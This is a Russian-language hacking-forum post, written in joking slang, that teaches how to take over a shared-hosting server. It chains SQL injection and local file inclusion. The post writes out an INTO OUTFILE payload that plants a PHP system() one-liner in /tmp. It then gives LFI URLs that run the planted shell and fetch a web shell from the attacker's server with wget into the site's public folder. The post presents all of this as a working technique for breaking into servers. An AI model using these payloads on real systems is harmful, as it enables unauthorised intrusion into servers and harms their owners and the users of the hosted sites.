1. Do you speak English? Use the English version of the site! Link
    Скрыть объявление
Скрыть объявление
Здравствуй гость! После регистрации на ресурсе, ты сможешь скачивать материалы с форума и участвовать в его жизни! Для регистрации откройте соответствующую форму или нажмите на эту ссылку.

Заливаем шелл

Тема в разделе "Взлом", создана пользователем KrevedKo, 21.09.2015.

Метки:
  1. KrevedKo

    KrevedKo Местный

    Дек 04 2016 в 12:54
    Регистрация:
    13.09.2015
    Сообщения:
    171
    Симпатии:
    127
    Подготовка:
    Итак речь пойдёт об очинь изящном и важном способе захватить целевой сервер. О чом многие хацкеры даже не думают тык ето о том што очинь даже неплохо когда сервер хостит много сайтов.
    Скажем мы выбрали цель(сервак), делаем реверс IP lookup, штоб узнать скока сайтов захостено там. Тык вот, сервер значт хостит 5 сайтов к премеру. После тыкания и скана на уязвимости на всех 5 сайтах, находим один каторый уязвим для SQLi и другой каторый уязвим для LFi.

    Атака:
    Естессно большинство хацкеров выберут SQLi штоб взять учотку админа и попробывать залогиницца, потомушто ето быстрее нежели через LFi если /proc/self/environ не представлен на LFi-уязвимом сайте.
    Такшто впринцыпе мы всё делаем в етом случае верно, но когда мы пробуем залогиницца с учоткой которую мы увели из ДБ, она оказываецца устаревшей и вооще беспонтовой.
    Чо теперь? Сдадимся? Не.

    Атака 1.
    Итак, если у нас есть верные привелегии в SQLi конкретново юзера, мы можым прописать файлы на сервер через скуль. Итак, мы будим добавлять файл в папку в которую можно записывать, как правило папка temp записываемая, посему нам надо записать туда однолинейный шелл каторый позволит нам выполнять команды на сервере. Ну типа как php шелл, тока миниатюрный и который юзаецца через урл, безо всяких интерфейсов.
    Код:
    http://www.site.com/index.php?ID=-1 union select '<?system($_GET[cmd])?>',2,3,4,5 into outfile "/tmp/cmd.txt"--
    Тут мы закидываем cmd.txt каторый являецца нашим шеллом в tmp папку, каторая являецца записываемой. Обыкновенный скуль, 5 колонок, 1-я юзаецца для получения данных, так же, как и при получении версии version(), и просто добавляя в outfile"/tmp/cmd.txt" в конец синтаксиса.
    ТЕперь наш шелл создан и мы юзаем $cmd различные.

    Атака 2.
    Теперь когда у нас есть наш файло на серваке вернёмся к нашему LFi уязвимому сайту, который на том же сервере и прочтём cmd.txt, попробуем выполнить команду и надеемся на то што шелл поднимецца. Етот шаг довольно прост.
    Типичная уязвимость LFI :
    Код:
    http://www.site.com/index.php?file=../etc/passwd
    Читаем cmd.txt
    Прочтём CMD.txt by используя LFI уязвимость:
    Код:
    http://www.site.com/index.php?file=../tmp/cmd.txt
    Запускаем команду на CMD.txt используя LFI уязвимость:
    Код:
    http://www.site.com/index.php?file=../tmp/cmd.txt&cmd=wget http://[email protected]/myshell.txt -O /full-path-of-site/public_html/shell.php
    (Ето запустит $cmd variable в cmd.txt, штоб выполнить wget команду которая сольёт текстовый файло с нашево сервака, каторый являецца php шеллом с .тхт расширением и -O /full-path-of-site/public_html/shell.php команда переименует файло в shell.php, и конешно нам надо найти полный путь туда, штобы мы могли слить наш шелл в папку из которой мы можем открыть наш шелл браузером)

    Открываем шелл:
    Код:
    http://www.site.com/shell.php
    (Мы залили шелл юзая LFi уязвимость сайта, так што шелл пайдёт в root папку("hosting directory") сайта где мы ево сохранили)

    Всё, сервер благополучно взломан.
    Трюк забавный, короткий а главное действенный.
     
    lucefer нравится это.